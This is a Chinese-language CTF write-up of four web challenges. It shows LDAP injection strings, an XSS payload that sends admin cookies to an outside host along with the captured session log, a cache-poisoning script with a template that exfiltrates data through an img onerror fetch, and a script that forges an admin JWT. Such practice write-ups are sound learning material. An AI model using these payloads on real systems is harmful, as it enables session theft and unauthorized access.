Ldab
後來才明白原來題目名就已經是hint了, 進去之後就會發現輸入括號和沒有括號是有差別的, 然後想起來最近的noxCTF剛剛做過一個LDAP注入
之前那道題的payload是*)(|(descripton=*就可以了 學習網址 https://www.jianshu.com/p/d94673be9ed0 就是先尋找他的objectclass 總共9個一個一個測試
- commonName
- description
- seeAlso
- l
- o
- ou
- documentTitle
- documentVersion
- documentAuthor
- documentLocation
- documentPublisher
按之前怎麼試怎麼不行後來多了一個括號突然就可以啦。
這道題需要多一個括號就好了 *))(|(ou=* 猜測他是有三個括號來結尾
No Vulnerable Services
這道題是考驗auth認證的過程吧=。= 我還以爲跟之前的tjctf做的差不多,太菜了太菜了 這道題居然有CSP!!!我終於看到xss題目了
Content-Security-Policy: default-src 'none'; script-src *.no.vulnerable.services https://www.google.com/ https://www.gstatic.com/; style-src *.no.vulnerable.services https://fonts.googleapis.com/ 'unsafe-inline'; img-src *.no.vulnerable.services; font-src *.no.vulnerable.services https://fonts.gstatic.com/; frame-src https://www.google.com/
default-src 'none'
然後後面的說明所有的語句都只能在*.no.vulnerable.services 被加載進去 明顯可以發現有一個可以提交到後臺的地方,如果代碼有問題會顯示
這裏可以xss 在文章的最下面有
d8a50228.ip.no.vulnerable.services
d8a50228是目標ip的16進制
可以用這個來繞過csp
構造payload
var img = document.createElement("img"); img.src = "http://784eb86f.ip.no.vulnerable.services/?cookie=" + encodeURI(document.cookie); document.body.appendChild(img);
成功訪問了我的xss.js
216.165.2.40 - - [17/Sep/2018:20:33:46 +0800] "GET /xss.js HTTP/1.1" 200 0 "http://admin.no.vulnerable.services/review.php?id=2421" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/69.0.3497.81 HeadlessChrome/69.0.3497.81 Safari/537.36"
可是腳本沒有加載進去。 換了服務器就可以了
17/Sep/2018:21:16:13 +0800] "GET /xss.js HTTP/1.1" 200 504 "http://admin.no.vulnerable.services/review.php?id=2423" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/69.0.3497.81 HeadlessChrome/69.0.3497.81 Safari/537.36" 216.165.2.40 - - [17/Sep/2018:21:16:13 +0800] "GET /?cookie=PHPSESSID=khodgtpntqt58611ai47nf20vk HTTP/1.1" 200 328 "http://admin.no.vulnerable.services/review.php?id=2423" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/69.0.3497.81 HeadlessChrome/69.0.3497.81 Safari/537.36"
http://admin.no.vulnerable.services/login.php
訪問lb.php可以看到
有一個216.165.2.41開着,但是進不去 猜測是要開個support的代理纔可以 support.no.vulnerable.services直接訪問是不行的 ping 一下 support.no.vulnerable.services
172.16.2.5
所以可以使用ac100205.ip.no.vulnerable.services作爲代理來進入216.165.2.41
這樣就好了然後就可以進入216.165.2.41
發現可以ping
命令注入了 就可以直接cat flag
nice
Hacker Movie Club
其實可能是因爲我卡的原因。我的第一個想法是繞過谷歌驗證 然後在下面發現了一個cdn.js
for (let t of document.head.children) { if (t.tagName !== 'SCRIPT') continue; let { cdn, src } = t.dataset; if (cdn === undefined || src === undefined) continue; fetch(`//${cdn}/cdn/${src}`,{ headers: { 'X-Forwarded-Host':cdn }} ).then(r=>r.blob()).then(b=> { let u = URL.createObjectURL(b); let s = document.createElement('script'); s.src = u; document.head.appendChild(s); }); }
可以通過這個讀到mustache.min.js和app.js的源代碼 mustache.min.js 有點長。 app.js
var token = null; Promise.all([ fetch('/api/movies').then(r=>r.json()), fetch(`//294dc176089c1c625bb201a21887f828c043e545.hm.vulnerable.services/cdn/main.mst`).then(r=>r.text()), new Promise((resolve) => { if (window.loaded_recapcha === true) return resolve(); window.loaded_recapcha = resolve; }), new Promise((resolve) => { if (window.loaded_mustache === true) return resolve(); window.loaded_mustache = resolve; }) ]).then(([user, view])=>{ document.getElementById('content').innerHTML = Mustache.render(view,user); grecaptcha.render(document.getElementById("captcha"), { sitekey: '6Lc8ymwUAAAAAM7eBFxU1EBMjzrfC5By7HUYUud5', theme: 'dark', callback: t=> { token = t; document.getElementById('report').disabled = false; } }); let hidden = true; document.getElementById('report').onclick = () => { if (hidden) { document.getElementById("captcha").parentElement.style.display='block'; document.getElementById('report').disabled = true; hidden = false; return; } fetch('/api/report',{ method: 'POST', body: JSON.stringify({token:token}) }).then(r=>r.json()).then(j=>{ if (j.success) { // The admin is on her way to check the page alert("Neo... nobody has ever done this before."); alert("That's why it's going to work."); } else { alert("Dodge this."); } }); } });
還有一個main.mst
<div class="header"> Hacker Movie Club </div> {{#admin}} <div class="header admin"> Welcome to the desert of the real. </div> {{/admin}} <table class="movies"> <thead> <th>Name</th><th>Year</th><th>Length</th> </thead> <tbody> {{#movies}} {{^admin_only}} <tr> <td>{{ name }}</td> <td>{{ year }}</td> <td>{{ length }}</td> </tr> {{/admin_only}} {{/movies}} </tbody> </table> <div class="captcha"> <div id="captcha"></div> </div> <button id="report" type="submit" class="report"></button>
這個是一開始的佈局 wp的意思這道題需要用緩存投毒來做 js緩存投毒我還是第一次碰到 學習
import requests X_Forwarded_Host = '1.1.1.1' while True: resp = requests.get("http://294dc176089c1c625bb201a21887f828c043e545.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host}) print resp.headers if X_Forwarded_Host in resp.text: print resp.text break
成功緩存投毒 試一下 把X_Forwarded_Host換成自己的服務器之後跑了一會腳本就可以看到他請求了我的服務器已經成功投毒
所以我在自己的服務器下創建一個cdn的目錄和main.mst的文件,讓他訪問一個假的模板
<div class="header"> Hacker Movie Club </div> <div class="header admin"> Welcome to the desert of the real. </div> <table class="movies"> <thead> <th>Name</th><th>Year</th><th>Length</th> </thead> <tbody> {{#movies}} <tr> <td>{{ name }}</td> <td>{{ year }}</td> <td>{{ length }}</td> </tr> {{/movies}} </tbody> </table> <div class="captcha"> <div id="captcha"></div> </div> <button id="report" type="submit" class="report"></button> <img src=x onerror="fetch('http://www.ckj123.com/'+'{{#movies}}{{ name }}{{/movies}}')">
成功了呀。可是投不進去爲啥
看網絡應該是成功了,304緩存成功了,爲啥一直loading。
SSO
這道題是用來了解auth2.0協議的過程的。我覺得 看到過烏雲上的oauth認證繞過
一步一步來
import requests import jwt #Authorization Request code = requests.post("http://web.chal.csaw.io:9000/oauth2/authorize", headers={"Content-Type": "application/json"}, json={"response_type":"code","redirect_uri":"http://web.chal.csaw.io:9000/protected"}, allow_redirects=False).text code = code.split("protected?code=")[1].split("&")[0] #Access Token Request r = requests.post("http://web.chal.csaw.io:9000/oauth2/token", json={"grant_type":"authorization_code","code": code,"redirect_uri":"http://web.chal.csaw.io:9000/protected"}).text token = r.split('"')[7] #Modifing Token as admin res= jwt.decode(token, 'ufoundme!', algorithms=['HS256']) token = jwt.encode({'type': 'admin', 'secret': 'ufoundme!', 'iat': res['iat'], 'exp': res['exp']}, 'ufoundme!', algorithm='HS256') #Final Request req = requests.get("http://web.chal.csaw.io:9000/protected", headers={"Authorization": "Bearer " + token}).text print(req)
感言
這次的比賽還是非常好的。讓我學到了新知識 緩存投毒和oauth認證的問題 感謝。
參考資料
https://www.anquanke.com/post/id/156356 https://bugs.shuimugan.com/bug/view?bug_no=207504 https://segmentfault.com/a/1190000013467122